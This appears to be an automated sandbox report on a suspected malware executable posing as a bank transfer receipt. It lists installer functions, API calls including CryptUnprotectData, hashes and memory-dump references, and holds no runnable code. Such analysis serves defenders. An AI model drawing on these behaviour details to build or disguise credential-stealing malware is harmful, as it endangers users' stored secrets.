Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: 06fadfaa6bdd1743c224a57f1fa3d051dabd33ef56df0071652300793eec0471
Instruction ID: fb6460544efe8fce5462e25cc9af4f7d3d1b7b368dfcdde6bb1bed5e2218b2c2
Opcode Fuzzy Hash: 06fadfaa6bdd1743c224a57f1fa3d051dabd33ef56df0071652300793eec0471
Instruction Fuzzy Hash: BC01A231958281AFE7026BB0AE0AB9A7F74FF25301F004479F501B62E2C77810048B6E

Uniqueness

Uniqueness Score: -1.00%

Function 00405AD6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040601A: lstrcpynW.KERNEL32(?,?,00000400,00403317,00428200,NSIS Error), ref: 00406027

Part of subcall function 00405A79: CharNextW.USER32(?,?,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,?,00405AED,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,76BF3420,?,C:\Users\user\AppData\Local\Temp\,0040582B,?,76BF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405A87
Part of subcall function 00405A79: CharNextW.USER32(00000000), ref: 00405A8C
Part of subcall function 00405A79: CharNextW.USER32(00000000), ref: 00405AA4

lstrlenW.KERNEL32(dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,00000000,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,76BF3420,?,C:\Users\user\AppData\Local\Temp\,0040582B,?,76BF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B2F
GetFileAttributesW.KERNEL32(dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,00000000,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,76BF3420,?,C:\Users\user\AppData\Local\Temp\,0040582B,?,76BF3420,C:\Users\user\AppData\Local\Temp\), ref: 00405B3F

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405AD6
dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon, xrefs: 00405ADC, 00405AE1, 00405AE7, 00405B28, 00405B2E, 00405B36, 00405B3E

Memory Dump Source

Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\Users\user\AppData\Local\Temp\$dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon
API String ID: 3248276644-1197487810
Opcode ID: a98bc8d6da3f7a1147296ea9518b403604e3dfaf614f974499b81bc4e28990f4
Instruction ID: ed71898f9691fad2d221d0acf12a8c788c2999d668287f0dc65a00c2ad5638d3
Opcode Fuzzy Hash: a98bc8d6da3f7a1147296ea9518b403604e3dfaf614f974499b81bc4e28990f4
Instruction Fuzzy Hash: 4CF04425301E5115CA22367A2C44AAF2414DFC236474A073BF842B22D1CA3CA943DDBE

Uniqueness

Uniqueness Score: -1.00%

Function 00405A79 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,?,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,?,00405AED,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,76BF3420,?,C:\Users\user\AppData\Local\Temp\,0040582B,?,76BF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405A87
CharNextW.USER32(00000000), ref: 00405A8C
CharNextW.USER32(00000000), ref: 00405AA4

Strings

dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon, xrefs: 00405A7A

Memory Dump Source

Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: CharNext
String ID: dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon
API String ID: 3213498283-4087429501
Opcode ID: 9abac7bd8d8eb78344d3a0fd8b33b6e2d04e06e22655e8e5944c69e008adfdc9
Instruction ID: 2b58bc667f998461ca91ac7b18547026c13bd309f09f4c7a6bbb9f4139172dd1
Opcode Fuzzy Hash: 9abac7bd8d8eb78344d3a0fd8b33b6e2d04e06e22655e8e5944c69e008adfdc9
Instruction Fuzzy Hash: 09F09611B10B1295DB3276544CC5A7766BCEF94361F14823BE501B72C0E3FC48818FEA

Uniqueness

Uniqueness Score: -1.00%

Function 004059CE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403257,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 004059D4
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403257,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 004059DE
lstrcatW.KERNEL32(?,00409014), ref: 004059F0

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004059CE

Memory Dump Source

Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3355392842
Opcode ID: ce28085f9c7adc99732b92a49d05da966114328c7b00a7a022c5dbca455b4791
Instruction ID: 0310c51cfe5e9f7ce5f17852bd92726e60929743d8abc3d3bdfc5d6511664db2
Opcode Fuzzy Hash: ce28085f9c7adc99732b92a49d05da966114328c7b00a7a022c5dbca455b4791
Instruction Fuzzy Hash: C0D0A731111530ABC211AB488D04DDF739C9E463453424037F101B31A1D7785D5197FE

Uniqueness

Uniqueness Score: -1.00%

Function 00402D8A Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,00402F6A,?,?,?,"C:\Users\user\Desktop\comprobante de transferencia.exe",00403500,?), ref: 00402D9D
GetTickCount.KERNEL32 ref: 00402DBB
CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402DD8
ShowWindow.USER32(00000000,00000005,?,?,"C:\Users\user\Desktop\comprobante de transferencia.exe",00403500,?), ref: 00402DE6

Memory Dump Source

Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 011416fe75702845bce1ba086311cd5158525b87b3682f64fb458bf13ee2241f
Instruction ID: 84c2018479133c1a06627c8befec1d2e01839f263682f94960fa8353d768859b
Opcode Fuzzy Hash: 011416fe75702845bce1ba086311cd5158525b87b3682f64fb458bf13ee2241f
Instruction Fuzzy Hash: 29F0DA30909220BFC7616B24FD4CADB7BA5BB44B11B4145BAF005A11E4D3B95C81CA9D

Uniqueness

Uniqueness Score: -1.00%

Function 00403B39 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71COMMON

Download Yara Rule

APIs

SetWindowTextW.USER32(00000000,00428200), ref: 00403BD1

Strings

1033, xrefs: 00403B3D, 00403B47, 00403BB8
"C:\Users\user\Desktop\comprobante de transferencia.exe", xrefs: 00403B3A

Memory Dump Source

Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: TextWindow
String ID: "C:\Users\user\Desktop\comprobante de transferencia.exe"$1033
API String ID: 530164218-305335609
Opcode ID: 07cfb7d5982a44ac816326128a11e32eef50163c4320bcc031c4abfc4802e1d0
Instruction ID: a3bd2acee85f271d60691375da4bc4fc24ae93d70a97cc42eb68c8ddca864a14
Opcode Fuzzy Hash: 07cfb7d5982a44ac816326128a11e32eef50163c4320bcc031c4abfc4802e1d0
Instruction Fuzzy Hash: C311F631B40611EBC7349F15DC809777BBCEB45719718857FE801A73A2CA39AD038A68

Uniqueness

Uniqueness Score: -1.00%

Function 004050ED Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0040511C
CallWindowProcW.USER32(?,?,?,?), ref: 0040516D

Part of subcall function 0040412A: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040413C

Strings

, xrefs: 004050FD

Memory Dump Source

Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: b772241499b65645409c9fc33f4f8930a921897f459ee4d2270c46b35a81506b
Instruction ID: de30b2b7089f6fefb08e10281d0b4b3c30be484ea7ef601637de59f0c5b2ee24
Opcode Fuzzy Hash: b772241499b65645409c9fc33f4f8930a921897f459ee4d2270c46b35a81506b
Instruction Fuzzy Hash: 18015E71A0060CABDF216F11DD80B9B3A26EB94354F104036FA05792D2C3BA8C929B6D

Uniqueness

Uniqueness Score: -1.00%

Function 004037CE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,76BF3420,00000000,C:\Users\user\AppData\Local\Temp\,004037A6,004035BC,?), ref: 004037E8
GlobalFree.KERNEL32(?), ref: 004037EF

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004037CE

Memory Dump Source

Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-3355392842
Opcode ID: cc9cc45aeb8a1a052ae149341dfb74268264b46ba2e5a2dd49a2ce89511675a7
Instruction ID: fd5cce2495c6c1b199366fa48a4731a267e7b28c4e3a2e6049d666ad51adf226
Opcode Fuzzy Hash: cc9cc45aeb8a1a052ae149341dfb74268264b46ba2e5a2dd49a2ce89511675a7
Instruction Fuzzy Hash: F3E0C2B39040305BC7216F14EC4471AB7A86F88B32F058126F8817B3A087742C924FD8

Uniqueness

Uniqueness Score: -1.00%

Function 00405A1A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\comprobante de transferencia.exe,C:\Users\user\Desktop\comprobante de transferencia.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\comprobante de transferencia.exe",00403500,?), ref: 00405A20
CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\comprobante de transferencia.exe,C:\Users\user\Desktop\comprobante de transferencia.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\comprobante de transferencia.exe",00403500,?), ref: 00405A30

Strings

C:\Users\user\Desktop, xrefs: 00405A1A

Memory Dump Source

Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-3370423016
Opcode ID: e45900919dc7b28d9a36bacb3120ea694efe9c6a74e904a90cb467e5f79bac44
Instruction ID: 6345b2d933a2ce4686671ca67b85a4373090522c5e7ae7861229ca93a50cc92f
Opcode Fuzzy Hash: e45900919dc7b28d9a36bacb3120ea694efe9c6a74e904a90cb467e5f79bac44
Instruction Fuzzy Hash: 95D05EB2521A309BC312AB08DC4199F63ACEF223057468426F441A61A0D3785C808AB9

Uniqueness

Uniqueness Score: -1.00%

Function 100010E1 Relevance: 5.1, APIs: 4, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
GlobalFree.KERNEL32(00000000), ref: 100011C7
GlobalFree.KERNEL32(00000000), ref: 100011D9
GlobalFree.KERNEL32(?), ref: 10001203

Memory Dump Source

Source File: 00000000.00000002.2927007333.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2926984123.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2927043710.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2927075558.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_comprobante de transferencia.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765

Uniqueness

Uniqueness Score: -1.00%

Function 00405B54 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E35,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B64
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405B7C
CharNextA.USER32(00000000,?,00000000,00405E35,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B8D
lstrlenA.KERNEL32(00000000,?,00000000,00405E35,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B96

Memory Dump Source

Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 922b063ced0d048d400f1e9b804922caee6ea3aadebd60a230e58aa4fefa9f78
Instruction ID: 09ddfbf6a96cc3af2c4d2f748c9cef087a74b3384d996a5f3154f8737d8de66f
Opcode Fuzzy Hash: 922b063ced0d048d400f1e9b804922caee6ea3aadebd60a230e58aa4fefa9f78
Instruction Fuzzy Hash: 86F0C231904514EFC7129FA5CC00D9FBBB8EF06350B2540A5E800F7351D634FE019BA9

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: comprobante de transferencia.exePID: 8496, Parent PID: 3144COMMON

Execution Graph

Execution Coverage:	9.3%
Dynamic/Decrypted Code Coverage:	96.9%
Signature Coverage:	3.1%
Total number of Nodes:	98
Total number of Limit Nodes:	7

Executed Functions

Function 3714B4E0 Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 396
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

hmE6, xrefs: 3714B789

Memory Dump Source

Source File: 00000002.00000002.7703237352.0000000037140000.00000040.00000800.00020000.00000000.sdmp, Offset: 37140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37140000_comprobante de transferencia.jbxd

Similarity

API ID:
String ID: hmE6
API String ID: 0-3714938458
Opcode ID: f2e978482b4876139409802f1e53ff73730064bf06ac75eca5ecce61cb9b60d6
Instruction ID: ba322232566a28d6f70ac29954835e81488cd2b513f131d41d580531e9a20226
Opcode Fuzzy Hash: f2e978482b4876139409802f1e53ff73730064bf06ac75eca5ecce61cb9b60d6
Instruction Fuzzy Hash: 4BF16C75A00308CFEB15CFA9C988B9EBBF1BF88314F258559D405AF2A1DB75A945CF40

Uniqueness

Uniqueness Score: -1.00%

Function 364498F8 Relevance: 1.6, APIs: 1, Instructions: 56encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 36449965

Memory Dump Source

Source File: 00000002.00000002.7702458201.0000000036440000.00000040.00000800.00020000.00000000.sdmp, Offset: 36440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36440000_comprobante de transferencia.jbxd

Similarity

API ID: CryptDataUnprotect
String ID:
API String ID: 834300711-0
Opcode ID: b5fc8594d7652ec54f31699367cd4b2e103d3a0eba49fe38d97351059c484dfb
Instruction ID: f2be29c42d12c7c1d84f1aae5b5333eeb871885cef7557f62eebe75523b11c44
Opcode Fuzzy Hash: b5fc8594d7652ec54f31699367cd4b2e103d3a0eba49fe38d97351059c484dfb
Instruction Fuzzy Hash: EA1112B6800249EFDB11DF9AC845BDEBBF4EB48320F14841AE918A7610C379A594DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 36449100 Relevance: 1.6, APIs: 1, Instructions: 55encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 36449965

Memory Dump Source

Source File: 00000002.00000002.7702458201.0000000036440000.00000040.00000800.00020000.00000000.sdmp, Offset: 36440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36440000_comprobante de transferencia.jbxd

Similarity

API ID: CryptDataUnprotect
String ID:
API String ID: 834300711-0
Opcode ID: 9c852fb241d0c2ac303c8f8dc1f1b56ce276234eac8b7d80b933954119bb8971
Instruction ID: 7ea7a91ba5cba3125a4c45d3993ad6b19c8e92db59a64bab6fa69881c1200d9d
Opcode Fuzzy Hash: 9c852fb241d0c2ac303c8f8dc1f1b56ce276234eac8b7d80b933954119bb8971
Instruction Fuzzy Hash: 321167B2800349DFDB11DF9AC845BDEBBF4EF48320F14841AEA14A7200C339A990DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 3705C0B0 Relevance: 6.1, APIs: 4, Instructions: 133
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 3705C13E
GetCurrentThread.KERNEL32 ref: 3705C17B
GetCurrentProcess.KERNEL32 ref: 3705C1B8
GetCurrentThreadId.KERNEL32 ref: 3705C211

Memory Dump Source

Source File: 00000002.00000002.7703129668.0000000037050000.00000040.00000800.00020000.00000000.sdmp, Offset: 37050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37050000_comprobante de transferencia.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: df6d4e3514f5f8de39a61b17f245f4e72de38fd45ac00d00fcdfbee9dbeb03e2
